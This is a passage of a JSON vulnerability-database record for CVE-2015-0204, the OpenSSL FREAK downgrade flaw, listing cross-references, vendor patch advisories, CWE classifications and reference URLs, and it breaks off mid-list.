"JVNDB-2015-001672", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU98974537", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU91828320", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU95877131", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-001009", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.4252", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201501-171", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2015-0204", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131045", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133318", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138473", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133317", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130987", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131408", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133325", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130545", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#243585" }, { "db": "VULMON", "id": "CVE-2015-0204" }, { "db": "BID", "id": "71936" }, { "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "db": "PACKETSTORM", "id": "131045" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "138473" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "CNNVD", "id": "CNNVD-201501-171" }, { "db": "NVD", "id": "CVE-2015-0204" } ] }, "id": "VAR-201501-0338", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4675421719999999 }, "last_update_date": "2024-07-23T19:53:23.981000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "\u30a2\u30e9\u30a4\u30c9\u30c6\u30ec\u30b7\u30b9\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831", "trust": 1.6, "url": "http://jvn.jp/vu/jvnvu99125992/522154/index.html" }, { "title": "NV15-016", "trust": 1.6, "url": "http://jpn.nec.com/security-info/secinfo/nv15-016.html" }, { "title": "[08 Jan 2015]", "trust": 1.6, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "title": "3046015", "trust": 0.8, "url": "https://technet.microsoft.com/ja-jp/library/security/3046015" }, { "title": "APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "title": "HT204659", "trust": 0.8, "url": "https://support.apple.com/en-us/ht204659" }, { "title": "HT204659", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht204659" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "title": "Only allow ephemeral RSA keys in export ciphersuites.", "trust": 0.8, "url": "https://github.com/openssl/openssl/commit/ce325c60c74b0fa784f5872404b722e120e5cab0" }, { "title": "HS15-018", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs15-018/index.html" }, { "title": "HS15-019", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs15-019/index.html" }, { "title": "HPSBGN03299 SSRT101987", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04604357" }, { "title": "HPSBHF03289", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04602055" }, { "title": "HPSBUX03244 SSRT101885", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04556853" }, { "title": "1883640", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883640" }, { "title": "\u30a2\u30e9\u30a4\u30c9\u30c6\u30ec\u30b7\u30b9\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831 (JVNVU#98974537)", "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu98974537/522154/index.html" }, { "title": "\u30a2\u30e9\u30a4\u30c9\u30c6\u30ec\u30b7\u30b9\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831 (JVNVU#95877131)", "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95877131/522154/index.html" }, { "title": "NV15-015", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-015.html" }, { "title": "NV15-017", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-017.html" }, { "title": "[19 Mar 2015] RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20150319.txt" }, { "title": "Oracle Critical Patch Update Advisory - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "title": "Oracle Critical Patch Update Advisory - April 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "title": "Text Form of Oracle Critical Patch Update - January 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016verbose-2367956.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015verbose-2365613.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015verbose-2367947.html" }, { "title": "Oracle Third Party Bulletin - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "title": "RHSA-2015:0800", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2015-0800.html" }, { "title": "RHSA-2015:0849", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2015-0849.html" }, { "title": "RHSA-2015:0066", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "title": "July 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2015_critical_patch_update" }, { "title": "January 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/january_2016_critical_patch_update" }, { "title": "April 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2015_critical_patch_update" }, { "title": "October 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "http://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "CVE-2015-0204", "trust": 0.8, "url": "https://www.suse.com/security/cve/cve-2015-0204.html" }, { "title": "OpenSSL\u306b\u8907\u6570\u306e\u8106\u5f31\u6027 (19 Mar 2015)", "trust": 0.8, "url": "http://www.seil.jp/support/security/a01545.html" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128755_cisco-sa-20150310-ssl-j.html" }, { "title": "HS15-018", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs15-018/index.html" }, { "title": "HS15-019", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs15-019/index.html" }, { "title": "TLSA-2015-2", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2015/tlsa-2015-2j.html" }, { "title": "\u682a\u5f0f\u4f1a\u793e\u30d0\u30c3\u30d5\u30a1\u30ed\u30fc \u306e\u544a\u77e5\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://buffalo.jp/support_s/s20150327b.html" }, { "title": "Oracle Corporation Java\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b", "trust": 0.8, "url": "http://www.fmworld.net/biz/common/oracle/20150416.html" }, { "title": "openssl-1.0.0p", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=53190" }, { "title": "openssl-0.9.8zd", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=53189" }, { "title": "openssl-1.0.1k.tar.gz", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=53191" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150066 - security advisory" }, { "title": "Cisco: OpenSSL RSA Temporary Key Cryptographic Downgrade Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150113-cve-2015-0204" }, { "title": "Red Hat: CVE-2015-0204", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-0204" }, { "title": "Symantec Security Advisories: SA91 : FREAK Attack", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=fb8c9ab0a61ac1def90eef5ef6757895" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2459-1" }, { "title": "Debian Security Advisories: DSA-3125-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a3210fee56d96657bbff4ad44c3d0807" }, { "title": "Amazon Linux AMI: ALAS-2015-469", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-469" }, { "title": "Splunk Security Announcements: Splunk Enterprise versions 6.1.7, 6.0.8, and 5.0.12 address two vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=e17c368f43499efc420edc223af663db" }, { "title": "Symantec Security Advisories: SA88 : OpenSSL Security Advisory 08-Jan-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=9281dc3b1a760e1cf2711cdf82cf64d7" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150310-ssl" }, { "title": "Apple: OS X Yosemite v10.10.3 and Security Update 2015-004", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=aa5ab46566482c02434bb8cf65c9614e" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=2a43c5799a7dd07d6c0a92a3b040d12f" }, { "title": "Tenable Security Advisories: [R6] OpenSSL \u002720150319\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-04" }, { "title": "Splunk Security Announcements: Splunk Enterprise 6.2.2 addresses two vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=d9c34d2680d213e5c9dae973a42328f1" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Splunk Security Announcements: Splunk response to January 2015 OpenSSL vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=21b119528a2fb8c78850a17027b71424" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8" }, { "title": "FreakVulnChecker", "trust": 0.1, "url": "https://github.com/felmoltor/freakvulnchecker " }, { "title": "Freak-Scanner", "trust": 0.1, "url": "https://github.com/scottjpack/freak-scanner " }, { "title": "FREAK-Attack-CVE-2015-0204-Testing-Script", "trust": 0.1, "url": "https://github.com/abhishekghosh/freak-attack-cve-2015-0204-testing-script " }, { "title": "stuff", "trust": 0.1, "url": "https://github.com/thekondrashov/stuff " }, { "title": "non-controlflow-hijacking-datasets", "trust": 0.1, "url": "https://github.com/camel-clarkson/non-controlflow-hijacking-datasets " }, { "title": "scz_doc_copy", "trust": 0.1, "url": "https://github.com/topcaver/scz_doc_copy " }, { "title": "checks", "trust": 0.1, "url": "https://github.com/cryptflow/checks " }, { "title": "tls", "trust": 0.1, "url": "https://github.com/greyleonie/tls " }, { "title": "JPN_RIC13351-2", "trust": 0.1, "url": "https://github.com/neominds/jpn_ric13351-2 " }, { "title": "script_a2sv", "trust": 0.1, "url": "https://github.com/f4rm0x/script_a2sv " }, { "title": "a2sv", "trust": 0.1, "url": "https://github.com/hahwul/a2sv " }, { "title": "a2sv", "trust": 0.1, "url": "https://github.com/84kaliplexon3/a2sv " }, { "title": "a2sv", "trust": 0.1, "url": "https://github.com/theripperjhon/a2sv " }, { "title": "sslscanner", "trust": 0.1, "url": "https://github.com/fireorb/sslscanner " }, { "title": "a2sv", "trust": 0.1, "url": "https://github.com/h4ck3rt3ch/a2sv " }, { "title": "HTTPSScan", "trust": 0.1, "url": "https://github.com/alexoslabs/httpsscan " }, { "title": "A2SV--SSL-VUL-Scan", "trust": 0.1, "url": "https://github.com/nyctophile6/a2sv--ssl-vul-scan " }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/07/06/awoogah_get_ready_to_patch_severe_bug_in_openssl_this_thursday/" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/03/13/cisco_freaks_out_starts_epic_openssl_bugsplat/" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/03/03/government_crippleware_freaks_out_tlsssl/" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/01/09/dead_openssl_bugs_more_fleas_than_poodles/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0204" }, { "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "db": "CNNVD", "id": "CNNVD-201501-171" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.8 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "db": "NVD", "id": "CVE-2015-0204" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "https://www.smacktls.com/#freak" }, { "trust": 1.6, "url": "http://jvn.jp/vu/jvnvu99125992/index.html" }, { "trust": 1.5, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "trust": 1.4, "url": "https://github.com/openssl/openssl/commit/ce325c60c74b0fa784f5872404b722e120e5cab0" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2015-0849.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883640" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-1650.html" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/71936" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:019" }, { "trust": 1.1, "url": "http://support.novell.com/security/cve/cve-2015-0204.html" }, { "trust": 1.1, "url": "https://freakattack.com/" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3125" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496289803847\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00021.html" }, { "trust": 1.1, "url": "https://www.openssl.org/news/secadv_20150319.txt" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142720981827617\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:063" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "trust": 1.1, "url": "https://support.apple.com/ht204659" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0800.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00026.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143213830203296\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144043644216842\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142895206924048\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050205101530\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496179803395\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa88" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00003.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00000.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00004.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00006.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00005.html" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa91" }, { "trust": 1.1, "url": "https://security.gentoo.org/glsa/201503-11" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033378" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04773241" }, { "trust": 1.1, "url": "http://www-304.ibm.com/support/docview.wss?uid=swg21960769" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00031.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00022.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00015.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00014.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10110" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10108" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10102" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/99707" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.8, "url": "http://blog.cryptographyengineering.com/2015/03/attack-of-week-freak-or-factoring-nsa.html" }, { "trust": 0.8, "url": "http://cwe.mitre.org/data/definitions/757.html" }, { "trust": 0.8, "url": "http://cwe.mitre.org/data/definitions/326.html" }, { "trust": 0.8, "url": "https://tools.ietf.org/html/rfc4346#appendix-f.1.1.2" }, { "trust": 0.8, "url": "https://technet.microsoft.com/library/security/3046015.aspx" }, { "trust": 0.8, "url": "http://www.kb.cert.org/vuls/id/243585" }, { "trust": 0.8, "url": "http://www.ipa.go.jp/security/ciadr/vul/20150415-jre.html" }, { "trust": 0.8, "url": "http://www.jpcert.or.jp/at/2015/at150010.html" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu98974537/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95877131/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91828320/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0204" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.6, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.4252/" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-01-30.pdf" }, { "trust": 0.3, "url": "http://www.splunk.com/view/sp-caaanv8#announce1" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://www.splunk.com/view/sp-caaanu5#affectedproductsandcomponents" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699667" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/160" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101011689" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04602055" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04773241" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765115" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774019" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774021" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04679334" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022548" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022550" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005334" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902260" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903805" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960151" }, { "trust": 0.3, "url": 